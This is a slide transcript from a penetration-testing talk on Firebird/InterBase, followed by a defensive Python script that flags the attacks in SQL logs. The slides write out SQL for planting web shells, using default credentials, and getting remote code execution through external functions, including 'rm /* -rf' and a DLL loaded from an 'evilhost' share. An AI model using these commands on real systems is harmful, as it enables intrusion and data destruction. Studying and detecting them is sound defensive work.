Firebird Interbase Database engine hacks or rtfm

Notes on database security assessment

    Presentation Transcript

    • Firebird/interbase database engine hacks or RTFM Osipov Alexey @GiftsUngiven
    • /whoami
        • Osipov Alexey
        • Web-hacker, pentester, member of SCADAStrangeLove
        • PHDays, BlackHat, NoSuchCon speaker
        • Developer of different pentesting PoCs
            – XML
            – MySQL
        • Twitter: @GiftsUngiven
    • Why so serious?
        • “Pseudo” market shares
            – mysql, MSSQL, Oracle, postgresql, …
                • 99%
            – Firebird
                • 1%
        • That means
            – mysql, MSSQL, Oracle, postgresql, …
                • N ways to own them
            – Firebird
                • No ways to own it
    • Pentesting
        • Requirements
            – SQLi
                • https://forum.antichat.ru/
                • https://rdot.org
            – Account
                • Which is sysdba:masterkey most of the time
                • No ways to escape it
            – RW filesystem
            – Execute
            – So..
    • File creation (part 1)
        • Create difference file
            – CONNECT '<host>:<existent database>';
            – ALTER DATABASE ADD DIFFERENCE FILE 'filename';
            – ALTER DATABASE BEGIN BACKUP;
            – INSERT INTO TABLE `exploited` VALUES ('<ASP/JSP/PHP shell>');
            – COMMIT;
        • Your file is locked, so
            – EXIT;
    • File creation (part 2)
        • Database creation
            – CREATE DATABASE '<host>:<arbitrary non-existent path>';
            – CREATE TABLE a ('value' BLOB);
            – INSERT INTO a VALUES ('<ASP/JSP/PHP shell>');
            – COMMIT;
        • Again, your file is locked
            – EXIT
    • RCE (part 1)
        • Main problem is configuration (but sometimes enabled):
        • *nix (like in PostgreSQL)
            – DECLARE EXTERNAL FUNCTION exec cstring(4096) RETURNS cstring(4096) ENTRY_POINT 'system' MODULE_NAME '/lib/libc.so';
            – SELECT FIRST 1 exec('rm /* -rf') FROM any_table LIMIT 1;
    • RCE (part 2)
        • Windows
            – DECLARE EXTERNAL FUNCTION exec cstring(4096), integer RETURNS integer BY VALUE ENTRY_POINT 'WinExec' MODULE_NAME 'c:\windows\system32\kernel32.dll';
            – SELECT FIRST 1 exec('net user /add ****', 1) FROM any_table LIMIT 1;
        • Kudos to Alexander Tlyapov (@Rigros1)
    • RCE (part 3)
        • Windows
            – DECLARE EXTERNAL FUNCTION exec cstring(4096) RETURNS cstring(4096) ENTRY_POINT 'Exec' MODULE_NAME '\\evilhost\share\udf.dll';
            – SELECT FIRST 1 exec('net user /add ****') FROM any_table LIMIT 1;
        • No NTLM auth on host, so SAMBA with anonymous login only
        • Can create any needed function
    • Questions? @GiftsUngiven
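
A defender's view of the statements on the slides above, as an added example that is not part of the original presentation: a Python check that flags those statement shapes (difference file, database creation at an odd path, external function bound to a library path) in logged SQL text. The rule names, severity labels and sample statements are constructed for illustration, and it assumes statement text is available from a trace or audit log.

```python
import re

# Added example: rule names, severities and samples are constructed, not from the slides.
WEB_EXT = re.compile(r"\.(php\d?|phtml|aspx?|jspx?)$", re.I)
DB_EXT = re.compile(r"\.(fdb|gdb|ib)$", re.I)
RULES = {
    "difference-file": re.compile(
        r"\bALTER\s+DATABASE\s+ADD\s+DIFFERENCE\s+FILE\s+'([^']*)'", re.I),
    "create-database": re.compile(
        r"\bCREATE\s+(?:DATABASE|SCHEMA)\s+'([^']*)'", re.I),
    "external-function": re.compile(
        r"\bDECLARE\s+EXTERNAL\s+FUNCTION\b.*?\bMODULE_NAME\s+'([^']*)'", re.I | re.S),
}

def classify(sql):
    """Return (rule, severity, target) for one statement, or None if it is unremarkable."""
    for rule, rx in RULES.items():
        m = rx.search(sql)
        if not m:
            continue
        target = m.group(1)
        if rule == "external-function":
            # Stock UDF libraries are declared by bare name ('ib_udf', 'fbudf');
            # a path or UNC share points at a library outside the UDF directory.
            sev = "high" if re.search(r"[\\/]", target) else "review"
        elif WEB_EXT.search(target):
            sev = "high"        # database page file created with a script extension
        elif rule == "create-database" and DB_EXT.search(target):
            return None         # ordinary database creation
        else:
            sev = "medium"      # unusual file name, worth a look
        return rule, sev, target
    return None

def scan(statements):
    """Return findings for every statement that matched a rule."""
    return [f for f in map(classify, statements) if f]

# Constructed sample statements, as they might appear in a trace or audit log.
SAMPLE = [
    "SELECT * FROM orders WHERE id = 7",
    "CREATE DATABASE 'dbhost:/data/app/inventory.fdb'",
    "CREATE DATABASE 'dbhost:/var/www/html/status.php'",
    "ALTER DATABASE ADD DIFFERENCE FILE '/var/www/html/d.jsp'",
    "DECLARE EXTERNAL FUNCTION rtrim CSTRING(255) RETURNS CSTRING(255) FREE_IT "
    "ENTRY_POINT 'IB_UDF_rtrim' MODULE_NAME 'ib_udf'",
    "DECLARE EXTERNAL FUNCTION exec CSTRING(4096) RETURNS CSTRING(4096) "
    "ENTRY_POINT 'system' MODULE_NAME '/lib/libc.so'",
]

if __name__ == "__main__":
    for rule, sev, target in scan(SAMPLE):
        print(f"{sev:6} {rule:18} {target}")
```
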